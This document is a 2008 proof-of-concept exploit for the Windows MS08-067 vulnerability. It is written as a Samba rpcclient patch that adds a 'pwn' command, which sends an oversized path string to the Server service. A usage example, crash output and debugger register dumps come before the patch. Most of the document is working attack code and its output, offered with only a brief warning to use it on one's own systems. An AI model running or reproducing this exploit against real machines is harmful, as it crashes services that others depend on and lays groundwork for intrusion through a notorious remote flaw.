This patch is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA

(c) Tim Brown, 2008
<mailto:timb@nth-dimension.org.uk>
<http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>

PoC exploit for MS08-067.

It is based on the *broken* PoC made available at:
http://www.securityfocus.com/data/vulnerabilities/exploits/31874.zip.

It uses Samba's rpcclient as the transport.  This patch adds an
additional command to rpcclient, the 'pwn' command which crashes
the Server service inside of netapi32.dll.  Since it crashes the
service, it should obviously only be used on systems that a) you own
and b) don't require availability.  Please don't abuse.

For example:
	user@localhost:~$ bin/rpcclient -UAdministrator%test 192.168.179.129 -c pwn
	Receiving SMB: Server stopped responding
	rpc_api_pipe: Remote machine 192.168.179.129 pipe \srvsvc fnum 0x4001
	returned critical error.
	Error was Call timed out: server did not respond after 10000
	milliseconds
	result was DOS code 0xe85eecc0
	cli_rpc_pipe_close: cli_close failed on pipe \srvsvc, fnum 0x4001 to
	machine 192.168.179.129.
	Error was Call timed out: server did not respond after 10000 milliseconds

Debugger output:
Registers:
EAX 01922FFE
ECX 0195F4BE UNICODE "cccccccccccccccccccccccccccccccccccccccccccccccccccccc
cccccccccccccccccccccccccccccccccccccccccccccc"
EDX 0195F8BC
EBX 0195005C
ESP 0195F484
EBP 0195F494
ESI 0195F4B4 UNICODE "\..\cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc"
EDI 0195F4B4 UNICODE "\..\cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc"
EIP 71C55FAD NETAPI32.71C55FAD
C 1  ES 0023 32bit 0(FFFFFFFF)
P 0  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 0  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FF96000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_MORE_DATA (000000EA)
EFL 00010203 (NO,B,NE,BE,NS,PO,GE,G)
ST0 empty 0.0
ST1 empty 0.0
ST2 empty 0.0
ST3 empty 0.0
ST4 empty 0.0
ST5 empty 0.0
ST6 empty 0.0
ST7 empty 0.0
               3 2 1 0      E S P U O Z D I
FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

Patch is below:
diff -ur samba-3.2.4/source/rpcclient/cmd_srvsvc.c samba-3.2.4-poc/source/rpcclient/cmd_srvsvc.c
--- samba-3.2.4/source/rpcclient/cmd_srvsvc.c	2008-09-18 07:49:02.000000000 +0100
+++ samba-3.2.4-poc/source/rpcclient/cmd_srvsvc.c	2008-10-24 15:14:15.000000000 +0100
@@ -673,6 +668,27 @@
 	return result;
 }
 
+static WERROR cmd_srvsvc_pwn(struct rpc_pipe_client *cli,
+				      TALLOC_CTX *mem_ctx,
+				      int argc, const char **argv)
+{
+	WERROR result;
+	NTSTATUS status;
+
+	unsigned char x[10000];
+	long q = 1;
+
+	status = rpccli_srvsvc_NetPathCanonicalize(cli, mem_ctx,
+					  cli->cli->desthost, ".\\\\c\\..\\..\\cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc", x, 10000, "", &q, 1, &result);
+
+	if (!NT_STATUS_IS_OK(status) || !W_ERROR_IS_OK(result)) {
+		goto done;
+	}
+  done:
+	return result;
+}
+
+
 static WERROR cmd_srvsvc_net_sess_enum(struct rpc_pipe_client *cli,
 				       TALLOC_CTX *mem_ctx,
 				       int argc, const char **argv)
@@ -891,6 +907,7 @@
 	{ "netsessenum", RPC_RTYPE_WERROR, NULL, cmd_srvsvc_net_sess_enum, PI_SRVSVC, NULL, "Enumerate Sessions", "" },
 	{ "netdiskenum", RPC_RTYPE_WERROR, NULL, cmd_srvsvc_net_disk_enum, PI_SRVSVC, NULL, "Enumerate Disks", "" },
 	{ "netconnenum", RPC_RTYPE_WERROR, NULL, cmd_srvsvc_net_conn_enum, PI_SRVSVC, NULL, "Enumerate Connections", "" },
+	{ "pwn", RPC_RTYPE_WERROR, NULL, cmd_srvsvc_pwn, PI_SRVSVC, NULL, "PWN", "" },
 
 	{ NULL }
 };